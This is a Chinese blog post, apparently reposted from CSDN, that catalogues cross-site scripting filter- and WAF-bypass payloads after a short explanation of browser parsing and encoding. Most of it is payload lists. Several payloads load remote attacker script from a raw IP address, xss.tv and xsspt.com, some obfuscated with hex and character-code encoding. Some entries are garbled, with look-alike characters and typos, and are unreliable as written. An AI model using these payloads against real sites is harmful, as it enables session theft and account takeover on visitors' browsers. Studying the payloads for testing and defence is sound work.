0
0

XSS绕过技巧

 1、首先是弹窗函数:

  1. alert(1)
  2. prompt(1)
  3. confirm(1) eval()

  2、然后是字符的编码和浏览器的解析机制:

    要讲编码绕过,首先我们要理解浏览器的解析过程,浏览器在解析HTML文档时无论按照什么顺序,主要有三个过程:HTML解析、JS解析和URL解析,每个解析器负责HTML文档中各自对应部分的解析工作。

    首先浏览器接收到一个HTML文档时,会触发HTML解析器对HTML文档进行词法解析,这一过程完成HTML解码并创建DOM树,接下来JavaScript解析器会介入对内联脚本进行解析,这一过程完成JS的解码工作,如果浏览器遇到需要URL的上下文环境,这时URL解析器也会介入完成URL的解码工作,URL解析器的解码顺序会根据URL所在位置不同,可能在JavaScript解析器之前或之后解析。

    三个解析过程所对应的字符编码分别为:HTML解析 => HTML实体编码 、JS解析 => Unicode编码 、URL解析 =>URL编码。

需要注意的是:

  1. 1、Unicode编码无法转换控制字符如【'】【"】【()】,仅仅会将这些当成普通字符,而不是控制字符,也就是说你无法在<script>标签中利用Unicode编码单双引号来闭合引号。 2、JavaScript伪协议除了HTML编码之外不能进行其他编码,这个单词必须是完整的,因为浏览器最先解析HTML,之后javascript必须是完整的。这个在ie6下才执行的。

  3、下面我们用实际例子来解释一下以上所说的浏览器解析过程和字符编码是怎么回事,以及今天的重点---XSS绕过。

....暂定

hidden属性标签

  1. 插入点在hidden前,新增一个type属性覆盖hidden:
  2. <input value='a' src=1 οnerrοr=alert(1) type="image" type="hidden">
  3. 插入点在hidden后,shift+alt+accesskey:
  4. <input value='a' type="hidden" accesskey="x" οnclick=alert(1)>

弹窗验证:

1、弹窗payload

  1. <a href=javascript:alert1>click
  2. <button ‘ οnclick=alert(1)//>
  3. <button οnfοcus=alert122>
  4. <object data=javascript:alert1>
  5. <body/οnfοcus=alert9989>
  6. <input antofocus οnfοcus=alert1>
  7. <svg><script xlink:href=data:,alert(1) />
  8. <iframe srcdoc=<svg/onload=alert(1)>>
  9. <svg/οnlοad=alert(1)>
  10. <x contenteditable οnblur=alert(1)>lose focus!
  11. lose focus!//contenteditable:使可编辑
  12. <x οncοntextmenu=alert(1)>right click this!
  13. <c οncοntextmenu=alert(1)>鼠标右键点击
  14. <iframe src=" javascript:prompt(1) ">
  15. <ScRipT 1>prompt(1)</ScRipT 123
  16. <input/οnfοcus=ev\u0061l(\u0061lert(1))>
  17. <input antofocus οnfοcus=\u0061lert(1)>
  18. <iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  19.   #payload的=号前加空格即可绕过waf
  21. <iframe/src='data:text/html,<svg οnlοad=alert(1)>'>
  22. [media=mp3,200,300]http://www.tudou.com/programs/view/a' οnlοad=alert(1) οnerrοr=alert(1)[/media]
  23. <img/src=1 οnmοuseοut=alert1>
  24. test3 //可以成功执行
  25. ClickMe
  27. <form><button formaction=javascript:alert(1)>CLICKME
  28. //必须要有双引号,不然执行不了
  29. 2//不能去掉双引号
  30. 2 //可以去掉双引号
  31. 2
  32. XSStest
  33. 'al\u0065rt'">
  35. <input/οninput=top'al\x65rt'>
  37. 0
  38. //以下都是要把[]进行url编码
  39.   //<img src=9989 οnerrοr=top/al/.source+/ert/.source>
  40.           //<img src=9989 οnerrοr=top"al"+"ert">
  41.                //<img src=9989 οnerrοr=top'al\145rt'>
  42.                     //<img src=9989 οnerrοr=top'al\x65rt'>
  43. <img/src=1 οnerrοr=top[8680439..toString30]1>
  44. <img/src=1 οnerrοr=top[8680439..toString30]1>
  45. <img/src=1 onError="alert(1)">    //使用时有时需要吧&#X进行URL编码
  46. <img/src=1 onError=top/al/.source+/ert/.source>
  47. <img/src='a'οnerrοr=[1].find(alert)>
  48. <img/src='2'οnerrοr=top8680439..toString(30)>
  49. <a/href=javascript:alert`1`>123</ a>
  50. <img/src='2'οnerrοr=top/al/.source+/ert/.source><p/οncοpy=alert(1)>
  51. <body οnhashchange=alert(1)>click this!#x
  52. <body style=overflow:auto;height:1000px οnscrοll=alert(1) id=x>#x
  53. <body οnresize=alert(1)>press F12!
  54. <body οnpageshοw=alert(1)>
  55. <body οnfοcus=alert(1)>
  56. <marquee onstart=alert(1)>
  57. <marquee loop=1 width=0 onfinish=alert(1)>
  60. <input autofocus οnblur=alert(2)>
  61. <keygen autofocus οnfοcus=alert(3)>
  62. <form οnsubmit=alert(4)><input type=submit>
  63. <select οnchange=alert(5)><option>1<option>2
  64. <menu id=x contextmenu=x οnshοw=alert(6)>right click me! <meta content="0;https://www.baidu.com"HTTP-EQUIV="refresh""/> <meta content="0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlhTUyIpPC9zY3JpcHQ+"HTTP-EQUIV="refresh""/>
  65. <svg><animate xlink:href=#xss attributeName=href values="</li> <li> </li> <li> javascript:alert(1)" /><text x=20 y=20>XSS</text>
  66. <svg><animate xlink:href=#xss attributeName=href fill=freeze dur=1ms values="http://isec.pl;javascript:alert(1)" /><text x=20 y=20>XSS</text> <svg><animate xlink:href=#xss attributeName=href fill=freeze dur=1ms values="http://isec.pl;javascript:alert(1)" /><text x=20 y=20>XSS</text> <svg><animate xlink:href=#xss attributeName=href values=" javascript:alert(1)" /><text x=20 y=20>XSS</text>
  68. MM

2、引入外部js,需要有jQuery库

  1. <html>
  2. <head>
  3. <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.js"></script>
  4. </head>
  5. <body>
  6. <img/src=1 οnerrοr=$.getScript("http://118.24.154.114/1.js");>
  7. 绕waf:
  8. <img/src=1 οnerrοr=jQueryatob('Z2V0U2NyaXB0')>
  9. 16进制 <img/src=1 οnerrοr=eval("\x24\x2E\x67\x65\x74\x53\x63\x72\x69\x70\x74\x28\x22\x68\x74\x74\x70\x3A\x2F\x2F\x31\x31\x38\x2E\x32\x34\x2E\x31\x35\x34\x2E\x31\x31\x34\x2F\x31\x2E\x6A\x73\x22\x29\x3B")>
  10. ascii码 <img/src=1 οnerrοr="eval(String.fromCharCode(36, 46, 103, 101, 116, 83, 99, 114, 105, 112, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 49, 49, 56, 46, 50, 52, 46, 49, 53, 52, 46, 49, 49, 52, 47, 49, 46, 106, 115, 34, 41, 59))">
  11. </body>
  12. </html>

3、Unicode编码绕过例子

  1. <html>
  2. <head>
  3. </head>
  4. <body>
  6. <script>
  7. var s="\u003cimg/src=1\u003e"; document.getElementById('s').innerHTML = s;
  8. </script>
  9. </body>
  10. </html>

以上代码由于使用了innerHTML 方法,可以使用Unicode表面皿绕过检测。

4、利用巧用换行绕过url规则检测:

  1. <?php
  2. $url = filter_var($_GET['url'],FILTER_VALIDATE_URL);
  3. var_dump($url);
  4. $url = htmlspecialchars($url);
  5. var_dump($url);
  6. echo "Next slide"
  7. ?>

      

利用代码:

  1. <img/src=1 οnmοuseοver=s=createElement('\163\143\162\151\160\164');body.appendChild(s);s.src="//xss.tv"> <img src=1 οnerrοr="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='\150\164\164\160\72'"> JS 8进制

下面是一位大佬的文章,这里直接引用了,有空再整理。

  1. https://bbs.ichunqiu.com/thread-31886-1-1.html

  1. 这里的连接字符,我研究出来一些payload,能够script,document等危险字符过滤的情况下,不需要在任何编码的情况下,去构造一个payload

  2. 当document被过滤的情况下,又不能用编码

  3. +被过滤,又不能编码

  4. <svg/οnlοad="[1].find(function(){with(\docomen\.1\t\.1);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">

  5. <svg/οnlοad="[1].find(function(){with(docom%27|e|%27nt);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">

  6. <svg/οnlοad="[1].find(function(){with(docom%27%2Be%2B%27nt);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">

  7. <svg/οnlοad="[1].find(function(){with(docom'+e+'nt);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">

  8. <svg/οnlοad="[1].find(function(){with(docom'-e-'nt);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

  9. <svg/οnlοad="[1].find(function(){with(docom'*e*'nt);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

  10. <svg/οnlοad="[1].find(function(){with(docom'/e/'nt);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

  11. <svg/οnlοad="[1].find(function(){with(docom'%e%'nt);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

  12. <svg/οnlοad="[1].find(function(){with(docom'^e^'nt);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

  13. <svg/οnlοad="[1].find(function(){with(docom'>e>'nt);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

  14. <svg/οnlοad="[1].find(function(){with(docom'<e<'nt);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

  15. <script type="text/javascript">

  16.   var a = ''>=alert``<='';

  17.   var a = ''+alert``+'';

  18. </script>

  19. <keygen autofocus οnfοcus=s=createElement("scriPt");body.appendChild(s);s.src="//xsspt.com/JUvhKT">支持火狐 360, 谷歌失败,过主机卫士

  20. 就是下面这些连接符号

  21. 输出在script内字符串位置的情况

  22. 如果允许闭合字符串,直接闭合并写入javascript即可,如:

  23. http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27

  24. http://t.mhz.pw/game/xss/scriptstr.php?xss='|alert(1)|'

  25. http://t.mhz.pw/game/xss/scriptstr.php?xss=%27%2Balert(1)%2B%27

  26. http://t.mhz.pw/game/xss/scriptstr.php?xss='+alert(1)+'

  27. http://t.mhz.pw/game/xss/scriptstr.php?xss='-alert(1)-'

  28. http://t.mhz.pw/game/xss/scriptstr.php?xss='*alert(1)*'

  29. http://t.mhz.pw/game/xss/scriptstr.php?xss='/alert(1)/'

  30. http://t.mhz.pw/game/xss/scriptstr.php?xss='%alert(1)%'

  31. http://t.mhz.pw/game/xss/scriptstr.php?xss='^alert(1)^'

  32. http://t.mhz.pw/game/xss/scriptstr.php?xss='>alert(1)>'

  33. http://t.mhz.pw/game/xss/scriptstr.php?xss='<alert(1)<'

  34. http://t.mhz.pw/game/xss/scriptstr.php?xss='>=alert(1)>='

  35. http://t.mhz.pw/game/xss/scriptstr.php?xss='<=alert(1)<='

  36. http://t.mhz.pw/game/xss/scriptstr.php?xss='==alert(1)=='

  37. http://t.mhz.pw/game/xss/scriptstr.php?xss='===alert(1)==='

  38. http://t.mhz.pw/game/xss/scriptstr.php?xss='!=alert(1)!='

  39. http://t.mhz.pw/game/xss/scriptstr.php?xss='!==alert(1)!=='

  40. http://t.mhz.pw/game/xss/scriptstr.php?xss='%26alert(1)%26'

  41. http://t.mhz.pw/game/xss/scriptstr.php?xss='&alert(1)&'

  42. http://t.mhz.pw/game/xss/scriptstr.php?xss='|alert(1)|'

  43. http://t.mhz.pw/game/xss/scriptstr.php?xss='||alert(1)||'

  44. http://t.mhz.pw/game/xss/scriptstr.php?xss='>=alert(1)<='

  45. <svg/οnlοad="[1].find(function(){with(docom'|e|'nt);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">

  46. <svg/οnlοad=[1].find(function(){with(/do/.source+/cument/.source)body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  47. <svg/οnlοad=[1].find(function(){with(/docomen/.source+/t/.source);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  48. <svg/οnlοad=[1].find(function(){with(/docomen/.source+/t/.source);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  49. <svg/οnlοad=[1].find(function(){with(/docomen/.1+/t/.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  50. /字符/.1+/字符/.1

  51. 字符加上字符

  52. //.1 + //.1 这些只是连接字符的方式而已 ,总结起来就是 document而已

  53. <svg/οnlοad=[1].find(function(){with(\docomen\.1+\t\.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  54. / 换成 \ 也可以

  55. <svg/οnlοad=[1].find(function(){with(\docomen\.1\t\.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  56. 不要加号也可以

  57. <svg/οnlοad=[1].find(function(){with(=docomen=.1+=t=.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  58. /换成=号也可以

  59. <svg/οnlοad=[1].find(function(){with(=docomen=.1=t=.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  60. 不要加号也可以

  61. <svg/οnlοad=[1].find(function(){with(^docomen^.1+^t^.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  62. /换成^号也可以

  63. <svg/οnlοad=[1].find(function(){with(^docomen^.1^t^.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  64. <svg/οnlοad=[1].find(function(){with(|docomen|.1+|t|.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  65. /换成|号也可以

  66. <svg/οnlοad=[1].find(function(){with(|docomen|.1|t|.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  67. <svg/οnlοad=[1].find(function(){with(&docomen&.1+&t&.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  68. /换成&号也可以

  69. <svg/οnlοad=[1].find(function(){with(&docomen&.1&t&.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  70. <svg/οnlοad=[1].find(function(){with(%26docomen%26.1+$26t%26.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  71. /换成%26也行

  72. <svg/οnlοad=[1].find(function(){with(%26docomen%26.1$26t%26.1);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  73. 不要引号也行

  74. Body加上括号也行

  75. <svg/οnlοad=[1].find(function(){with(docomen);(body.appendChild(createElement('script'))).src='http://xss.tv/XA'})>

  76. <body/οnlοad=document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,115,115,46,102,98,105,115,98,46,99,111,109,47,48,71,73,103,62,60,47,115,99,114,105,112,116,62))>

  77. <svg/οnlοad=[1].find(function(){with('docu'==='ment');body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

  78. 笨鸟先飞早入林,笨人勤学早成材。

  79. 转载请注明出处:

  80. 撰写人:fox-yu http://www.cnblogs.com/fox-yu/

标签: xss javascript 前端
本文转载自: https://blog.csdn.net/weixin_52501704/article/details/128968524
版权归原作者 H1111B 所有, 如有侵权,请联系我们删除。
登录后发布评论

“XSS绕过技巧”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

网络安全法-网络运行安全

使用selenium/drissionpage时如何阻止chrome自动跳转http到https

docker desktop 里部署的Open WebUI 管理员密码忘记了的处理方法

在ubuntu20.04中搭建onsite比赛运行环境

利用开源的低代码表单设计器FcDesigner高效管理和渲染复杂表单结构

Kafka学习笔记

【前端】浏览器输入url到页面呈现发生了什么?

文章导航